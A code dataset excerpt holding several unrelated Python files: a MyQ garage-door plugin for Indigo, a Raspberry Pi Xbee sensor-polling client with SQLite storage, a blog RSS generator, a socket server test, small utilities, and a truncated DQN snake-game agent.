indigo.devices[int(device.pluginProps[\"sensor\"])]\n except:\n self.logger.debug(\"Skipping triggers, no linked sensor for MyQ device %s\" % (device.name))\n return\n\n for triggerId, trigger in sorted(self.triggers.iteritems()):\n self.logger.debug(\"Checking Trigger %s (%s), Type: %s\" % (trigger.name, trigger.id, trigger.pluginTypeId))\n if isinstance(sensor, indigo.SensorDevice):\n sensor_state = sensor.onState\n elif isinstance(sensor, indigo.MultiIODevice):\n sensor_state = not sensor.states[\"binaryInput1\"] # I/O devices are opposite from sensors in terms of the state binary\n \n self.logger.debug(\"\\tmyqDoorSync: %s is %s, linked sensor %s is %s\" % (device.name, str(device.onState), sensor.name, str(sensor_state)))\n\n if device.onState == sensor_state: # these values are supposed to be opposite due to difference between sensor and lock devices\n indigo.trigger.execute(trigger) # so execute the out of sync trigger when they're not opposite\n\n\n ########################################\n # Menu Methods\n ########################################\n\n def checkForUpdates(self):\n self.updater.checkForUpdate()\n\n def updatePlugin(self):\n self.updater.update()\n\n def forceUpdate(self):\n self.updater.update(currentVersion='0.0.0')\n\n ########################################\n # ConfigUI methods\n ########################################\n\n def validatePrefsConfigUi(self, valuesDict):\n self.logger.debug(u\"validatePrefsConfigUi called\")\n errorDict = indigo.Dict()\n\n try:\n self.logLevel = int(valuesDict[u\"logLevel\"])\n except:\n self.logLevel = logging.INFO\n self.indigo_log_handler.setLevel(self.logLevel)\n self.logger.debug(u\"logLevel = \" + str(self.logLevel))\n\n if len(valuesDict['myqLogin']) < 5:\n errorDict['myqLogin'] = u\"Enter your MyQ login name (email address)\"\n\n if len(valuesDict['myqPassword']) < 1:\n errorDict['myqPassword'] = u\"Enter your MyQ login password\"\n\n statusFrequency = int(valuesDict['statusFrequency'])\n if (statusFrequency < 5) or (statusFrequency > (24 * 60)):\n errorDict['statusFrequency'] = u\"Status frequency must be at least 5 min and no more than 24 hours\"\n\n updateFrequency = int(valuesDict['updateFrequency'])\n if (updateFrequency < 0) or (updateFrequency > 24):\n errorDict['updateFrequency'] = u\"Update frequency is invalid - enter a valid number (between 0 and 24 hours)\"\n\n if len(errorDict) > 0:\n return (False, valuesDict, errorDict)\n\n if not self.myqLogin(username=valuesDict['myqLogin'], password=valuesDict['myqPassword'], brand=valuesDict['openerBrand']):\n errorDict['myqLogin'] = u\"Login to MyQ server failed, check login, password, and brand\"\n errorDict['myqPassword'] = u\"Login to MyQ server failed, check login, password, and brand\"\n return (False, valuesDict, errorDict)\n\n return (True, valuesDict)\n\n\n def closedPrefsConfigUi(self, valuesDict, userCancelled):\n if not userCancelled:\n try:\n self.logLevel = int(valuesDict[u\"logLevel\"])\n except:\n self.logLevel = logging.INFO\n self.indigo_log_handler.setLevel(self.logLevel)\n self.logger.debug(u\"logLevel = \" + str(self.logLevel))\n\n self.updateFrequency = float(self.pluginPrefs.get('updateFrequency', \"24\")) * 60.0 * 60.0\n self.logger.debug(u\"updateFrequency = \" + str(self.updateFrequency))\n self.next_update_check = time.time()\n\n self.statusFrequency = float(self.pluginPrefs.get('statusFrequency', \"10\")) * 60.0\n self.logger.debug(u\"statusFrequency = \" + str(self.statusFrequency))\n self.next_status_check = time.time() + self.statusFrequency\n\n self.getDevices()\n\n ################################################################################\n #\n # delegate methods for indigo.devices.subscribeToChanges()\n #\n ################################################################################\n\n def deviceDeleted(self, dev):\n indigo.PluginBase.deviceDeleted(self, dev)\n self.logger.debug(u\"deviceDeleted: %s \" % dev.name)\n\n for myqDeviceId, myqDevice in sorted(self.myqDevices.iteritems()):\n try:\n sensorDev = myqDevice.pluginProps[\"sensor\"]\n except:\n pass\n else:\n if dev.id == int(sensorDev):\n self.logger.info(u\"A device (%s) that was associated with a MyQ device has been deleted.\" % dev.name)\n newProps = myqDevice.pluginProps\n newProps[\"sensor\"] = \"\"\n myqDevice.replacePluginPropsOnServer(newProps)\n\n\n def deviceUpdated(self, origDev, newDev):\n indigo.PluginBase.deviceUpdated(self, origDev, newDev)\n# self.logger.debug(u\"deviceUpdated: %s \" % newDev.name)\n\n for myqDeviceId, myqDevice in sorted(self.myqDevices.iteritems()):\n# self.logger.debug(u\"\\tchecking MyQ Device: %s \" % myqDevice.name)\n try:\n sensorDev = int(myqDevice.pluginProps[\"sensor\"])\n except:\n pass\n else:\n if origDev.id == sensorDev:\n if isinstance(newDev, indigo.SensorDevice):\n old_sensor_state = origDev.onState\n sensor_state = newDev.onState\n elif isinstance(newDev, indigo.MultiIODevice):\n old_sensor_state = not origDev.states[\"binaryInput1\"] # I/O devices are opposite from sensors in terms of the state binary\n sensor_state = not newDev.states[\"binaryInput1\"] # I/O devices are opposite from sensors in terms of the state binary\n if old_sensor_state == sensor_state:\n self.logger.debug(u\"deviceUpdated: %s has not changed\" % origDev.name)\n return\n\n self.logger.debug(u\"deviceUpdated: %s has changed state: %s\" % (origDev.name, str(sensor_state)))\n if sensor_state:\n myqDevice.updateStateOnServer(key=\"onOffState\", value=False) # sensor \"On\" means the door's open, which is False for lock type devices (unlocked)\n else:\n myqDevice.updateStateOnServer(key=\"onOffState\", value=True) # sensor \"Off\" means the door's closed, which is True for lock type devices (locked)\n self.triggerCheck(myqDevice)\n\n ########################################\n\n def actionControlDevice(self, action, dev):\n\n if action.deviceAction == indigo.kDeviceAction.Unlock:\n self.logger.debug(u\"actionControlDevice: \\\"%s\\\" Unlock\" % dev.name)\n self.changeDevice(dev, kDoorOpen)\n\n elif action.deviceAction == indigo.kDeviceAction.Lock:\n self.logger.debug(u\"actionControlDevice: \\\"%s\\\" Lock\" % dev.name)\n self.changeDevice(dev, kDoorClose)\n\n elif action.deviceAction == indigo.kDeviceAction.RequestStatus:\n self.logger.debug(u\"actionControlDevice: \\\"%s\\\" Request Status\" % dev.name)\n self.getDevices()\n\n else:\n self.logger.error(u\"actionControlDevice: \\\"%s\\\" Unsupported action requested: %s\" % (dev.name, str(action)))\n\n\n ########################################\n\n\n def myqLogin(self, username=None, password=None, brand=None):\n\n if username == None or password == None or brand == None:\n self.logger.debug(u\"myqLogin failure, Username or Password not set\")\n return False\n\n url = self.apiData[brand][\"service\"] + '/api/v4/user/validate'\n# self.logger.debug(u\"myqLogin url = %s\" % str(url))\n\n headers = {\n 'User-Agent': userAgent, \n \"BrandId\": \"2\",\n \"ApiVersion\": \"4.1\",\n \"Culture\": \"en\",\n 'MyQApplicationId': self.apiData[brand][\"appID\"]\n }\n# self.logger.debug(u\"myqLogin headers = %s\" % str(headers))\n\n payload = {\n 'username': username, \n 'password': password\n }\n# self.logger.debug(u\"myqLogin payload = %s\" % str(payload))\n\n try:\n response = requests.post(url, json=payload, headers=headers)\n# self.logger.debug(u\"myqLogin response = %s\" % (str(response.text)))\n except requests.exceptions.RequestException as err:\n self.logger.debug(u\"myqLogin failure, request url = %s\" % (url))\n self.logger.error(u\"myqLogin failure, RequestException: %s\" % (str(err)))\n self.securityToken = \"\"\n return False\n\n if (response.status_code != requests.codes.ok):\n self.logger.debug(u\"myqLogin failure, Enum err code %s\" % (response.status_coderl))\n self.securityToken = \"\"\n return False \n\n try:\n data = response.json()\n except:\n self.logger.error(u\"myqLogin failure, JSON Decode Error\")\n self.securityToken = \"\"\n return False\n\n if data['ReturnCode'] != '0':\n self.logger.error(u\"myqLogin failure, Bad return code: %s\" % (data['ErrorMessage']))\n self.securityToken = \"\"\n return False\n\n self.securityToken = data['SecurityToken']\n self.logger.debug(u\"myqLogin successfull\")\n self.loginOK = True\n return True\n\n ########################################\n\n def getDevices(self):\n\n brand = self.pluginPrefs.get('openerBrand', None)\n \n if not self.myqLogin(username = self.pluginPrefs.get('myqLogin', None), password = self.pluginPrefs.get('myqPassword', None), brand=brand):\n self.logger.debug(u\"getDevices: MyQ Login Failure\")\n return\n\n url = self.apiData[brand][\"service\"] + '/api/v4/UserDeviceDetails/Get'\n params = {'appId':self.apiData[brand][\"appID\"], 'securityToken':self.securityToken}\n headers = {'User-Agent': userAgent }\n try:\n response = requests.get(url, params=params, headers=headers)\n except requests.exceptions.RequestException as err:\n self.logger.error(u\"getDevices: RequestException: \" + str(err))\n return\n\n data = response.json()\n if data['ReturnCode'] != '0':\n self.logger.error(u\"getDevices: Bad return code: \" + data['ErrorMessage'])\n return\n\n self.logger.debug(u\"getDevices: %d Devices\" % len(data['Devices']))\n\n for myqDevice in data['Devices']:\n self.logger.debug(u\"getDevices: MyQDeviceTypeId = %s, MyQDeviceTypeName = %s, DeviceId = %s\" % (myqDevice['MyQDeviceTypeId'], myqDevice['MyQDeviceTypeName'], myqDevice['MyQDeviceId']))\n\n # 2 = garage door, 5 = gate, 7 = MyQGarage(no gateway), 17 = Garage Door Opener WGDO\n\n if myqDevice['MyQDeviceTypeId'] == 1: # Gateway\n pass\n\n elif (myqDevice['MyQDeviceTypeId'] == 2) or (myqDevice['MyQDeviceTypeId'] == 5) or (myqDevice['MyQDeviceTypeId'] == 7) or (myqDevice['MyQDeviceTypeId'] == 17):\n\n myqID = myqDevice['MyQDeviceId']\n state = -1\n\n for attr in myqDevice['Attributes']:\n\n if attr[u'AttributeDisplayName'] == u'desc':\n descAttr = attr[u'Value']\n elif attr[u'AttributeDisplayName'] == u'name':\n nameAttr = attr[u'Value']\n elif attr[u'AttributeDisplayName'] == u'doorstate':\n state = int(attr[u'Value'])\n\n name = \"%s (%s)\" % (descAttr, nameAttr)\n\n if state > (len(doorStateNames) - 1):\n self.logger.error(u\"getDevices: Opener %s (%s), state out of range: %i\" % (name, myqDevice['MyQDeviceId'], state))\n state = 0 # unknown high states\n elif state == -1:\n self.logger.error(u\"getDevices: Opener %s (%s), state unknown\" % (name, myqDevice['MyQDeviceId']))\n state = 0 # unknown state\n\n found = False\n iterator = indigo.devices.iter(filter=\"self\")\n for dev in iterator:\n self.logger.debug(u'Checking Opener Device: %s (%s) against %s' % (dev.name, dev.address, myqID))\n if int(dev.address) == int(myqID):\n found = True\n newState = doorStateNames[state]\n if dev.states[\"doorStatus\"] != newState:\n self.logger.info(u\"%s %s is now %s (%d)\" % (myqDevice['MyQDeviceTypeName'], name, newState, state))\n dev.updateStateOnServer(key=\"doorStatus\", value=newState)\n if state == 2:\n dev.updateStateOnServer(key=\"onOffState\", value=True) # closed is True\n else:\n dev.updateStateOnServer(key=\"onOffState\", value=False) # anything other than closed is \"unlocked\"\n self.triggerCheck(dev)\n break\n \n if not found:\n self.logger.debug(u'Unknown MyQ Device: %s' % (myqID))\n\n # New MyQ device found, create it and set current state\n\n try:\n newdev = indigo.device.create(protocol=indigo.kProtocol.Plugin,\n address=myqID,\n description = \"Opener Device auto-created by MyQ plugin from gateway information\",\n deviceTypeId='myqOpener',\n name=name)\n except Exception as err:\n self.logger.error(u'Error Creating Opener Device: %s (%s)' % (name, myqDevice[u'MyQDeviceId']))\n continue\n \n newdev.updateStateOnServer(key=\"doorStatus\", value=doorStateNames[state])\n if state == 2:\n newdev.updateStateOnServer(key=\"onOffState\", value=True)\n else:\n newdev.updateStateOnServer(key=\"onOffState\", value=False)\n self.logger.debug(u'Created New Opener Device: %s (%s)' % (newdev.name, newdev.address))\n self.logger.info(u\"%s %s is %s (%d)\" % (myqDevice['MyQDeviceTypeName'], name, doorStateNames[state], state))\n\n elif myqDevice['MyQDeviceTypeId'] == 3: # Light Switch?\n pass\n# for attr in myqDevice['Attributes']:\n# self.logger.debug(u'\\t\"%s\" = \"%s\"' % (attr[u'AttributeDisplayName'], attr[u'Value']))\n\n else:\n for attr in myqDevice['Attributes']:\n self.logger.debug(u'\\t\"%s\" = \"%s\"' % (attr[u'AttributeDisplayName'], attr[u'Value']))\n\n\n ########################################\n\n def changeDeviceAction(self, pluginAction):\n self.logger.debug(u\"changeDeviceAction, deviceId = %s, actionId = \" % (pluginAction.deviceId, pluginAction.pluginTypeId))\n\n if pluginAction != None:\n myqDevice = indigo.devices[pluginAction.deviceId]\n myqActionId = pluginAction.pluginTypeId\n if myqActionId == \"openDoor\":\n self.changeDevice(myqDevice, kDoorOpen)\n elif myqActionId == \"closeDoor\":\n self.changeDevice(myqDevice, kDoorClose)\n else:\n self.logger.debug(u\"changeDeviceAction, unknown myqActionId = %s\" % myqActionId)\n\n def changeDevice(self, device, state):\n self.logger.debug(u\"changeDevice: %s, state = %s\" % (device.name, state))\n\n brand = self.pluginPrefs.get('openerBrand', None)\n \n if not self.myqLogin(username = self.pluginPrefs.get('myqLogin', None), password = self.pluginPrefs.get('myqPassword', None), brand=brand):\n self.logger.debug(u\"changeDevice: MyQ Login Failure\")\n return\n \n url = self.apiData[brand][\"service\"] + '/api/v4/DeviceAttribute/PutDeviceAttribute'\n# self.logger.debug(u\"changeDevice url = %s\" % str(url))\n\n headers = {\n 'SecurityToken': self.securityToken,\n 'MyQApplicationId': self.apiData[brand][\"appID\"],\n 'User-Agent': userAgent\n } \n# self.logger.debug(u\"changeDevice headers = %s\" % str(headers))\n\n payload = {\n 'attributeName': \"desireddoorstate\",\n 'myQDeviceId': int(device.address),\n 'AttributeValue': state,\n }\n# self.logger.debug(u\"changeDevice payload = %s\" % str(payload))\n \n try:\n response = requests.put(url, data=payload, headers=headers)\n except requests.exceptions.RequestException as err:\n self.logger.error(u\"changeDevice failure, RequestException: %s\" % (str(err)))\n return\n\n if (response.status_code != requests.codes.ok):\n self.logger.error(u\"changeDevice failure, Request error code: %s\" % (response.status_code))\n return\n \n data = response.json()\n if data['ReturnCode'] != '0':\n self.logger.debug(u\"changeDevice: Bad return code: \" + data['ErrorMessage'])\n\n # schedule an update to check on the movement\n self.next_status_check = time.time() + float(self.pluginPrefs.get('statusDelay', \"30\"))\n\n","sub_path":"MyQ.indigoPlugin/Contents/Server Plugin/plugin.py","file_name":"plugin.py","file_ext":"py","file_size_in_byte":23219,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"397899463","text":"#coding: utf-8\nimport os\nimport logging\nimport logging.handlers\nlog_file = 'my.log'\nlog_file = ''\n\nlogger = logging.getLogger('JY')\nlogger.setLevel(level = logging.DEBUG)\n#日志文件大小最大为1024k,文件个数最多4个,my.log存放最新日志,my.log4存放最旧日志\nif log_file != '':\n handler = logging.handlers.RotatingFileHandler(log_file, maxBytes=1024, backupCount=3)\nelse:#调试模式,打印到终端\n handler = logging.StreamHandler()\n\nfmt = '%(message)s'\nformatter = logging.Formatter(fmt)\nhandler.setFormatter(formatter)\nlogger.addHandler(handler)\n\nlogger.debug('test')\n\n","sub_path":"python/loger_demo.py","file_name":"loger_demo.py","file_ext":"py","file_size_in_byte":608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"318194941","text":"# --------------------------------------------------------------------------------------------- #\n# #\n# University of North Texas #\n# Department of Electrical Engineering #\n# #\n# Faculty Advisors: Dr. Xinrong Li, Dr. Jesse Hamner #\n# Name: Ovie Onoriose #\n# #\n# Date: 01/22/2017 #\n# #\n# Title: Occupancy Client for Raspberry Pi #\n# Version: 6.1.2 #\n# #\n# Description: #\n# This script sends a probe request on the Xbee connected to the Raspberry Pi #\n# to find all other active Xbee's (connected to sensor nodes) on the network #\n# It then proceeds to send requests and store the received data from each node #\n# sequentially. This received data is stored in a local SQlite database #\n# #\n# Dependencies: #\n# Python 3.5.1, Pyserial, sqlite3 #\n# #\n# Issues: #\n# The new CO2 sensors I received are different than the older ones and have a #\n# different protocol for accessing the sensor data. I will need to update the #\n# code to reflect the new protocol. The sensor nodes will also need to be updated #\n# to support the new mode of CO2 sensor #\n# #\n# Change Log:\n# v6.1.2 ((03/01/2017)\n# added trigger column to database if a pixel is higher than a certain\n# threshold #\n# v6.1 (01/22/2017) #\n# In the case that a node loses power or otherwise becomes unresponsive, #\n# Node discovery is performed to repopulate the list of active nodes so #\n# the program doesn't hang while trying to receive input #\n# #\n# --------------------------------------------------------------------------------------------- #\n\nimport serial\nimport sqlite3\nimport datetime\nimport time\nfrom collections import Counter\n\n# open serial port and connect to database\nser = serial.Serial('COM5', 115200, timeout=5) # open serial port\nconn = sqlite3.connect('occupancy.db') # connect to the database\nc = conn.cursor()\nc.execute(\"CREATE TABLE IF NOT EXISTS data (Node real, Datetime text, Grideye text, Trigger int, CO2PPM real, Temperature real, \\\nHumidity real, PIR real)\")\n\nnode_list = []\n\nclass MyList(list):\n def __repr__(self):\n return '[' + ', '.join(\"0x%X\" % x if type(x) is int else repr(x) for x in self) + ']'\n\n\ndef remove_node_dupes(x):\n count = Counter((i[1]) for i in x)\n while len([i for i in x if count[(i[1])] > 1]) > 1:\n x.remove(max([i for i in x if count[(i[1])] > 1]))\n count = Counter((i[1]) for i in x)\n\n\ndef find_checksum(packet): # find checksums of Xbee packets\n sum = 0\n for i in range(3,len(packet)):\n sum += packet[i]\n return (0xFF - (0xFF & sum))\n\ndef discovery():\n\n # reset serial buffers\n ser.flushInput()\n ser.flushOutput()\n time.sleep(.1)\n # send out broadcast requesting serials of all nodes on network\n node_request = [0x7E, 0x0, 0xF, 0x17, 0x1, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0xFF, 0xFF, 0xFF, 0xFE, 0x2, 0x73,\n 0x6C, 0xB] #checksum is already here\n ser.write(node_request)\n time.sleep(5)\n # received packets from nodes should be 23 bytes each\n nodes = int(ser.in_waiting/23)\n if nodes == 0:\n print('no nodes discovered')\n discovery()\n return\n del node_list[:]\n\n for i in range(nodes):\n a = ser.read()\n a = int.from_bytes(a, byteorder='big')\n if a != 0x7E: # check starting bit, discarding if wrong\n discovery()\n return\n l = ser.read(2)\n l = int.from_bytes(l, byteorder='big')\n b = ser.read()\n b = int.from_bytes(b, byteorder='big')\n if b != 0x97: # check if this is indeed a node identification packet\n discovery()\n return\n data = ser.read(l)\n node_address = tuple(data[14:18])\n node_list.append((i, node_address))\n print('node discovered. address:{0}'.format(MyList(list(node_address)),))\n remove_node_dupes(node_list)\n\n\ndef data_request(serial_low):\n ser.flushInput()\n ser.flushOutput()\n time.sleep(.1)\n # reset pin interrupt on launchpad\n request_end = [0x7E, 0x00, 0x10, 0x17, 0x00, 0x00, 0x13, 0xA2, 0x00] + list(serial_low) + \\\n [0xFF, 0xFE, 0x02, 0x44, 0x31, 0x04] # packet without checksum\n request_end.append(find_checksum(request_end)) # append checksum to packet\n ser.write(request_end)\n time.sleep(0.1)\n # Request for data for testing I'm sending test, the final thing to send is currently commented\n # toggles pin interrupt\n request = [0x7E, 0x00, 0x10, 0x17, 0x00, 0x00, 0x13, 0xA2, 0x00] + list(serial_low) + \\\n [0xFF, 0xFE, 0x02, 0x44, 0x31, 0x05] # packet without checksum\n request.append(find_checksum(request)) # append checksum to packet\n ser.write(request)\n print('requesting data from {0}\\n'.format(MyList(list(serial_low)),))\n return read_packet()\n\n\ndef read_packet():\n a = ser.read(1)\n if len(a) == 0:\n print('no data received. rediscovering nodes...\\n')\n return 1 # if no data is read, return 1 (Run discovery and restart at beginning of node_list)\n elif int.from_bytes(a, byteorder='big') != 0x7E: # check starting bit, discarding if wrong\n read_packet()\n return\n l = ser.read(2)\n l = int.from_bytes(l, byteorder='big') # calculate length of packet\n b = ser.read(1)\n b = int.from_bytes(b, byteorder='big')\n print('data type is {0}'.format(MyList([b]),))\n if b == 0x90:\n data_store(l)\n## elif b == 0x95:\n## node_joined(l)\n## return 2 # if a new node connects, return 2 (restart at beginning of node_list w/out running discovery)\n else:\n data = ser.read(l)\n print('data not synced right\\n')\n print(MyList(list(data)))\n if ser.in_waiting > 0:\n return read_packet()\n\n\ndef data_store(l):\n grideye = [0 for i in range(64)]\n data = ser.read(l) # read rest of packet\n print('data received:')\n print(MyList(list(data)))\n print('\\n')\n\n trigger = 0\n # Break data into more manageable sections\n # sixty four source address=data[0:8]\n # sixteen source address=data[8:10]\n rf_data = data[11:l - 1]\n\n node = rf_data[0]\n co2 = (rf_data[1] * 200)\n humid = ((rf_data[2] << 8) | rf_data[3]) / 10\n temp = ((rf_data[4] << 8) | rf_data[5]) / 10\n pir = rf_data[6]\n\n for i in range(64):\n grideye[i] = (((rf_data[2 * i + 7] << 8) | rf_data[2 * i + 8]) / 4)\n if grideye[i] > 25:\n trigger = 1\n\n # map grideye data to a string for simplicity in entering them into the database\n grid_str = ','.join(map(str, grideye))\n\n # finds the time\n current = datetime.datetime.now().strftime(\"%Y-%m-%dT%H:%M:%S:%f\")\n\n # insert data into database\n c.execute(\"INSERT INTO data(Node, Datetime, Grideye, Trigger, CO2PPM, Temperature, Humidity, PIR) VALUES (?, ?, ?, ?, ?, ?, ?, ?)\",\n (node, current, grid_str, trigger, co2, temp, humid, pir))\n conn.commit()\n\n\n##def node_joined(l):\n## data = ser.read(l)\n## node_address = tuple(data[17:21])\n## node_num = (max(x[0] for x in node_list)) + 1\n## node_list.append((node_num, node_address))\n## print('node joined. address:{0}'.format(MyList(list(node_address)),))\n## remove_node_dupes(node_list)\n\n####run once\n##discovery()\n##for t in range(5):\n## for i in node_list:\n## x = data_request(i[1]) # if data request returns 1, start over at discovery\n## if x: # if data request returns 2, start over at while loop after discovery\n## break\n## else:\n## time.sleep(.1)\n## continue\n## if x == 1:\n## break\n## else:\n## time.sleep(.1)\n## continue\n\n##run indefinitely\nwhile True:\n discovery()\n while True:\n for i in node_list:\n x = data_request(i[1]) # if data request returns 1, start over at discovery\n if x: # if data request returns 2, start over at while loop after discovery\n break\n if x == 1:\n break\n else:\n print('loop starting over')\n continue\n","sub_path":"Raspberry-Pi/RpiOccupancy-local.py","file_name":"RpiOccupancy-local.py","file_ext":"py","file_size_in_byte":10030,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"383406076","text":"class message():\n '''\n The data structure for message.\n We might need to add some when it comes to conversational.\n '''\n\n def __init__(self, sender, receiver, message_type, data):\n self.sender = sender\n self.receiver = receiver\n self.message_type = message_type\n self.data = data\n\n\n","sub_path":"ConTS/Yelp/message.py","file_name":"message.py","file_ext":"py","file_size_in_byte":325,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"171913196","text":"#SERVER SIDE (PYTHON)\n# for pi2 = connected to monitor\n# add sorting of train cars? sounds kind of difficult but would be nice\n\nimport socket\nimport time\n\nimport os\n\nHOST = ''\nPORT = 5007\n\n#create a socket on the network using port 8080\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n#name of the host (router, unless it has no name, then return IP address)\nHOSTNAME = socket.gethostname()\nserver_address = (HOST, PORT)\nprint('Hostname: %s' % HOSTNAME)\nprint(HOST)\nprint('starting up on %s port %s' % (server_address[0], server_address[1]))\n\n#binds to the host and port\ns.bind(server_address)\n#listens to the bound host's port\n#waits for (1) connection\ns.listen(1)\nprint('listening for a connection...')\n\n(CONNECTION, ADDRESS) = s.accept()\nprint(ADDRESS)\nprint('connection found...')\n\n \ndata = CONNECTION.recv(1024).decode(\"utf-8\")\nmsg = data\ndata = int(data)\n\nif data <= 100:\n print(data)\nCONNECTION.close()","sub_path":"PI2/Tests/testserver.py","file_name":"testserver.py","file_ext":"py","file_size_in_byte":921,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"133511579","text":"import statistics\nimport os\npath = \".\"\ndurations = []\nf = open(\"server.12679.log\")\ncounter = 0\nfor line in iter(f):\n if \"processing\" in line:\n for item in line.strip().split(\",\"):\n if \"used\" in item:\n duration = float(item.split(\" \")[2])\n durations.append(duration)\n counter += 1\n if counter == 3000:\n break\n \nf.close()\nprint(\"mean is:\", statistics.mean(durations))\nprint(\"var is:\", statistics.variance(durations))\n","sub_path":"bin/collect_process.py","file_name":"collect_process.py","file_ext":"py","file_size_in_byte":498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"650609273","text":"import time\nimport copy\nimport datetime\n\n\ndef get_feed(generator):\n tformat = \"%Y-%m-%d %H:%M\"\n\n res = []\n for md in generator.entry_cached:\n entries = generator.entry_cached[md][0]\n file_num_map = generator.entry_cached[md][1]\n\n for entry in entries.values():\n timestamp = time.mktime(datetime.\n datetime.\n strptime(entry.meta['date'], tformat).\n timetuple())\n meta = {}\n\n meta['action'] = \"New post in \" + generator.default['section']\n meta['date'] = entry.meta['date']\n meta['title'] = entry.meta['title']\n meta['section'] = generator.default['section']\n meta['description'] = entry.meta['description']\n blognum = file_num_map[entry.meta['md_filename']]\n meta['link'] = '${PREFIX}posts/blog' + str(blognum) + '.html'\n res.append((timestamp, meta))\n return res\n\n\nRSS_HEAD = '''\n\n\n\n'''\nRSS_END = '''\n\n\n'''\n\n\ndef produce_rss(generator):\n if 'rss_prefix' in generator.mdvar._global:\n prefix = generator.mdvar._global['rss_prefix']\n if not prefix.endswith('/'):\n prefix += '/'\n else:\n prefix = ''\n\n rss = [copy.deepcopy(RSS_HEAD)]\n rss.append('' +\n generator.mdvar._global['blogname'] +\n '')\n rss.append('' +\n prefix +\n '')\n rss.append('' +\n generator.mdvar._global['blogname'] +\n '')\n for item in sorted(get_feed(generator),\n key=lambda x: x[0],\n reverse=True)[:10]:\n rss.append('')\n rss.append('' + item[1]['title'] + '')\n rss.append('' + item[1]['link'] + '')\n rss.append('' + item[1]['description'] + '')\n rss.append('')\n\n rss.append(copy.deepcopy(RSS_END))\n\n fname = generator.mdvar._path['dst_prefix'] + 'rss.xml'\n content = '\\n'.join(rss).replace('${PREFIX}', prefix).strip('\\n')\n with open(fname, 'w') as f:\n f.write(content)\n","sub_path":"lib/template/blog/code/BlogFeed.py","file_name":"BlogFeed.py","file_ext":"py","file_size_in_byte":2321,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"288334442","text":"import random\r\nimport numpy as np\r\nfrom collections import deque\r\nfrom keras.models import Sequential\r\nfrom keras.layers import Dense, Activation,Dropout\r\nfrom keras.optimizers import Adam\r\nfrom keras import backend as K\r\nimport matplotlib.pyplot as plt\r\nimport pygame\r\nimport random\r\n\r\n#setup/initialize the environment\r\nblack = (20,20,20)\r\nwhite = (230,230,230)\r\nred = (230,0,0)\r\ngreen = (0,230,0)\r\nblue = (0,0,230)\r\ndisplay_width = 40\r\ndisplay_height = 40\r\nclock = pygame.time.Clock()\r\nfps = 30\r\nEPISODES = 12000\r\n\r\n\r\nclass DQNAgent:\r\n\r\n def __init__(self, state_size, action_size):\r\n self.state_size = state_size\r\n self.action_size = action_size\r\n self.memory = deque(maxlen=2000)\r\n self.gamma = 0.95 # discount rate\r\n self.epsilon = 1.0 # exploration rate\r\n self.epsilon_min = 0.01\r\n self.epsilon_decay1 = 0.999616309\r\n self.epsilon_decay2 = 0.998696842\r\n self.learning_rate = 0.001\r\n self.model = self._build_model()\r\n self.target_model = self._build_model()\r\n self.update_target_model()\r\n\r\n def _build_model(self):\r\n # Neural Net for Deep-Q learning Model\r\n model = Sequential()\r\n model.add(Dense(128, input_dim=self.state_size))\r\n model.add(Activation('relu'))\r\n\r\n model.add(Dense(128))\r\n model.add(Activation('relu'))\r\n\r\n model.add(Dense(self.action_size, activation='linear'))\r\n model.compile(loss=\"mean_squared_error\",\r\n optimizer=Adam(lr=self.learning_rate))\r\n return model\r\n\r\n def update_target_model(self):\r\n # copy weights from model to target_model\r\n self.target_model.set_weights(self.model.get_weights())\r\n self.model.save(\"C:/Users/subha/Desktop/python_codes/project4/spcw.hdf5\")\r\n print(\"special model saved\")\r\n\r\n def remember(self, state, action, reward, next_state, done):\r\n self.memory.append((state, action, reward, next_state, done))\r\n\r\n def act(self, state):\r\n if np.random.rand() <= self.epsilon:\r\n return random.randrange(self.action_size)\r\n act_values = self.model.predict(state)\r\n return np.argmax(act_values[0]) # returns action\r\n\r\n def replay(self, batch_size):\r\n minibatch = random.sample(self.memory, batch_size)\r\n for state, action, reward, next_state, done in minibatch:\r\n target = self.model.predict(state)\r\n if done:\r\n target[0][action] = reward\r\n else:\r\n Q_future = self.model.predict(next_state)[0]\r\n target[0][action] = reward + self.gamma * np.amax(Q_future)\r\n self.model.fit(state, target, epochs=1, verbose=0)\r\n if self.epsilon > self.epsilon_min:\r\n self.epsilon *= self.epsilon_decay1\r\n\r\n def load(self,name):\r\n self.model.load_weights(name)\r\n\r\n def save(self,name):\r\n self.model.save_weights(name)\r\n\r\n\r\n\r\npygame.init()\r\n\r\nfont = pygame.font.SysFont(\"Arial.ttf\",30)\r\n\r\npygame.display.set_caption(\"snake environment for data fetch\")\r\n\r\ngameDisplay = pygame.display.set_mode((display_width,display_height),pygame.RESIZABLE)\r\n\r\n\r\n\r\n\r\n#define snake class\r\nclass Snake():\r\n def __init__(self):\r\n self.length_counter = 1\r\n self.body_list = []\r\n self.body_thickness = 20\r\n self.head_x = round(display_width / 2 / self.body_thickness) * self.body_thickness\r\n self.head_y = round(display_height / 2 / self.body_thickness) * self.body_thickness\r\n self.head_x_change = 0\r\n self.head_y_change = 0\r\n def draw(self,act):\r\n if act == 0 and self.head_x_change == 0:\r\n self.head_x_change = -self.body_thickness\r\n self.head_y_change = 0\r\n if act == 1 and self.head_x_change == 0:\r\n self.head_x_change = self.body_thickness\r\n self.head_y_change = 0\r\n if act == 2 and self.head_y_change == 0:\r\n self.head_y_change = -self.body_thickness\r\n self.head_x_change = 0\r\n if act == 3 and self.head_y_change == 0:\r\n self.head_y_change = self.body_thickness\r\n self.head_x_change = 0\r\n self.head_x += self.head_x_change\r\n self.head_y += self.head_y_change\r\n self.body_list.append([self.head_x,self.head_y])\r\n if len(self.body_list) > self.length_counter:\r\n del self.body_list[0]\r\n for XnY in self.body_list[:-1]:\r\n pygame.draw.rect(gameDisplay,white,[XnY[0],XnY[1],self.body_thickness,self.body_thickness])\r\n 